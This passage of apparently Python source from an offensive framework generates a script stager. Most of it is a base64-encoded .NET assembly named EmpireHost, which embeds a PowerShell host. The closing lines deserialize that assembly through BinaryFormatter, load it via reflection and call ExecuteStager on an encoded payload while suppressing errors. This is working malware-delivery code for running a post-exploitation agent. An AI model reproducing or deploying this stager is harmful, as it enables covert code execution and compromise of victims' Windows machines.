            code +="s = s & \"AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A\"\n"
            code +="s = s & \"dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA\"\n"
            code +="s = s & \"aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0\"\n"
            code +="s = s & \"AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA\"\n"
            code +="s = s & \"UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA\"\n"
            code +="s = s & \"ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp\"\n"
            code +="s = s & \"AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA\"\n"
            code +="s = s & \"ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ\"\n"
            code +="s = s & \"AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA\"\n"
            code +="s = s & \"ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA\"\n"
            code +="s = s & \"C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S\"\n"
            code +="s = s & \"sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c\"\n"
            code +="s = s & \"HRJRCBJRBAAAEk0GIAEBEoEBCAACEkkScRJNBAABARwEAAASRQUgAQESSQUgAQESUQggABUSXQES\"\n"
            code +="s = s & \"YQMHARwEAAECDgUgARJFDgQgABJRBSAAEoERBxUSXQESgRUFIAETAAgJIAIBEYEZEYEZCyABFRJd\"\n"
            code +="s = s & \"ARJhEoEdEgcGHBJZHBUSXQESYRUSZQEcDgUgABKBIQogBAESVQ4RgSUcBRUSZQEcBSABARMABhUS\"\n"
            code +="s = s & \"XQESYQMgAAgDIAAcBSAAEoCBBSACDggIBAcBEmkFBwIcElUFIAASgSkFIAARgS0DIAAOBQAAEoEx\"\n"
            code +="s = s & \"BCAAEn0HIAQBCAgICAQAABF5IAcGFRKAlQIOEmEVEoCdARKAmRKAmR0ODhUSgJUCDhJhBwAEDg4O\"\n"
            code +="s = s & \"Dg4KIAMBEYC5EYC5DggVEoCVAg4SYQcVEl0BEoCZCSAAFRKAnQETAAgVEoCdARKAmQQgABMAAwAA\"\n"
            code +="s = s & \"DgUAARJhHAcgAgETABMBAyAAAg8HBRQOAgACAAASgI0IDggEAAASfQcUDgIAAgAACQADDhKBRQ4d\"\n"
            code +="s = s & \"HAYgARKAjQ4HFRJdARKAoQUgAQ4SfQUAAgIODgUAAg4ODiMHDBQOAgACAAASgI0VEl0BCBUSXQEI\"\n"
            code +="s = s & \"CAgVEoCdAQgICA4OCAUVEl0BCAYVEoClAQgGFRKAnQEICyADEoCNEoFFDh0cByACEoCNCAgEBwES\"\n"
            code +="s = s & \"KAcgAgEOEoC1BAABAQ4FBwERgLkFAAARgLkGAAEBEYC5AwAAAQcHAx0OHQ4DAgYOBiABHQ4dAwQg\"\n"
            code +="s = s & \"AQMIDAcDFA4CAAIAAAgdDgUgAgEICAYgAwEICA4EIAEBHAogABUSgVEBEoFVBSACAQ4cCBUSgVEB\"\n"
            code +="s = s & \"EoFVFQcKFRKAxQESUQ4ODg4SYRJRHQ4IDgcVEoDFARJRBSABElEOBiACElEOHAYgAhJRDgIFIAAd\"\n"
            code +="s = s & \"EwAEBwIODgYAAQ4RgWkGAAMODg4OCgcEDhKAyRKAzQ4EBhKAzQYgARKAzQ4EIAEcDgUAABKAyQQA\"\n"
            code +="s = s & \"AQ4OCAABEoF1EYF5CAABEoDJEoF1AwAACAUAAgEICAQAAQEIAwAAAgIGGAUAABKBgQUgABKAhQ4H\"\n"
            code +="s = s & \"BxKAtRKAtQ4IAwMSKAQKARIoBCABAQMECgESLBMHDRJUETgYGAgYCBgIAhFQCB4ABgABGBKAtQUA\"\n"
            code +="s = s & \"AgIYGAQAARgIBQACGBgIAh4ABAABARgLBwYSVBgYAhFQHgAFIAIBDg4GAAMBGAgGBAABDhgEBwES\"\n"
            code +="s = s & \"TAQgAB0DERABARUSgMUBHgAVEoClAR4AAwoBAwYVEoGZAQMFIAIBHBgGFRKAxQEDCiABARUSgZkB\"\n"
            code +="s = s & \"EwAPBwcSgI0SgI0SgI0ICAgICwcICAgIGBgYCBIsBwcDEoC1CAMFAAIGGAgGBwISgLUIBgABCBKB\"\n"
            code +="s = s & \"dQi3elxWGTTgiQgxvzhWrTZONTpTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABc\"\n"
            code +="s = s & \"AFAAbwB3AGUAcgBTAGgAZQBsAGwAIFAAbwB3AGUAcgBTAGgAZQBsAGwARQBuAGcAaQBuAGUAHkEA\"\n"
            code +="s = s & \"cABwAGwAaQBjAGEAdABpAG8AbgBCAGEAcwBlAAIxAAQBAAAABAIAAAAEEAAAAAQgAAAABAABAAAE\"\n"
            code +="s = s & \"AAIAAAQAEAAABAAAABAEBAAAAAQIAAAABEAAAAAEgAAAAAQABAAABAAIAAAEAEAAAAQAAAIABAAA\"\n"
            code +="s = s & \"BAAEAAAIAAQAABAABP9/AAAEAQIAAAQAAAAABMcEAAAEVwAAAATsAwAAARUDBhIMAgYCAgYIAwYS\"\n"
            code +="s = s & \"EAMGEkkDBhJFAgYcAwYReQMGEn0DBhIUAwYSHAQGEoC1AwYROAMGETwDBhFQBCABAg4FIAEBElUG\"\n"
            code +="s = s & \"IAIBHBJtBSABARIMBCAAEXkEIAASSRIACQgQETQIEAkYCRAYEAkQAggVAAkCCBgJEoCNEAgSgI0Q\"\n"
            code +="s = s & \"CBKAjRAIBSAAEoCREyADFRKAlQIOEmEODhUSXQESgJkNIAQIDg4VEl0BEoChCBYgBBUSXQEIDg4V\"\n"
            code +="s = s & \"El0BEoChFRKApQEICSAEEoCpDg4ODg8gBhKAqQ4ODg4RgK0RgLEFIAASgLUHIAIBChKAvQUAAR0O\"\n"
            code +="s = s & \"DhAAARQOAgACAAAVEl0BEoChCAAEEmEODg4OBgABHRJRDgcAAh0SUQ4CBQACDg4CBgADDg4CAgUg\"\n"
            code +="s = s & \"ABGAuQYgAQERgLkFIAARgNUGIAEBEYDVBSAAEYDZBiABARGA2Q4gARQRgN0CAAIAABGA4QggARGA\"\n"
            code +="s = s & \"5RGA6Q8gBAERgOERgNkRgOERgN0PIAIBEYDZFBGA3QIAAgAACSACARGA4RGA3QYAAhIoDg4HAAMS\"\n"
            code +="s = s & \"KA4OGAgABBIoDg4ODgkABRIoDg4YDg4GAAISLA4OBwADEiwODhgMAAQSLA4OEoC1EoC1DQAFEiwO\"\n"
            code +="s = s & \"DhgSgLUSgLUIAAMSKBJADg4MAAMSLBJAEoC1EoC1DRABAx4AEkASgLUSgLUHAAMSKA4ODggABBIo\"\n"
            code +="s = s & \"Dg4OGAkABRIoDg4ODg4KAAYSKA4ODhgODgYAARIoEkQIAAMSKBJEDg4HAAMSLA4ODggABBIsDg4O\"\n"
            code +="s = s & \"GA0ABRIsDg4OEoC1EoC1DgAGEiwODg4YEoC1EoC1BgABEiwSRAwAAxIsEkQSgLUSgLUNEAEDHgAS\"\n"
            code +="s = s & \"RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO\"\n"
            code +="s = s & \"Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY\"\n"
            code +="s = s & \"GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI\"\n"
            code +="s = s & \"BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA\"\n"
            code +="s = s & \"EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC\"\n"
            code +="s = s & \"FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB\"\n"
            code +="s = s & \"ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky\"\n"
            code +="s = s & \"OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA\"\n"
            code +="s = s & \"UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI\"\n"
            code +="s = s & \"b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc\"\n"
            code +="s = s & \"kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y\"\n"
            code +="s = s & \"RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs\"\n"
            code +="s = s & \"AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA\"\n"
            code +="s = s & \"AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu\"\n"
            code +="s = s & \"AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA\"\n"
            code +="s = s & \"aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv\"\n"
            code +="s = s & \"AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A\"\n"
            code +="s = s & \"CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0\"\n"
            code +="s = s & \"AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A\"\n"
            code +="s = s & \"AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA\"\n"
            code +="s = s & \"AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA\"\n"
            code +="s = s & \"IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA\"\n"
            code +="s = s & \"AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA\"\n"
            code +="s = s & \"SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw\"\n"
            code +="s = s & \"AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA\"\n"
            code +="s = s & \"LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu\"\n"
            code +="s = s & \"ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl\"\n"
            code +="s = s & \"bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA\"\n"
            code +="entry_class = \"EmpireHost\"\n"
            code +="\n"
            code +="Dim fmt, al, d, o\n"
            code +="Set fmt = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\n"
            code +="Set al = CreateObject(\"System.Collections.ArrayList\")\n"
            code +="al.Add fmt.SurrogateSelector\n"
            code +="\n"
            code +="Set d = fmt.Deserialize_2(Base64ToStream(s))\n"
            code +="Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)\n"
            code +="o.ExecuteStager EncodedPayload\n"
            code +="End Sub\n"
            code +="\n"
            code +="SetVersion\n"
            code +="On Error Resume Next\n"
            code +="Run\n"
            code +="If Err.Number <> 0 Then\n"
            code +="  Debug Err.Description\n"
            code +="  Err.Clear\n"
            code +="End If\n"
	return code
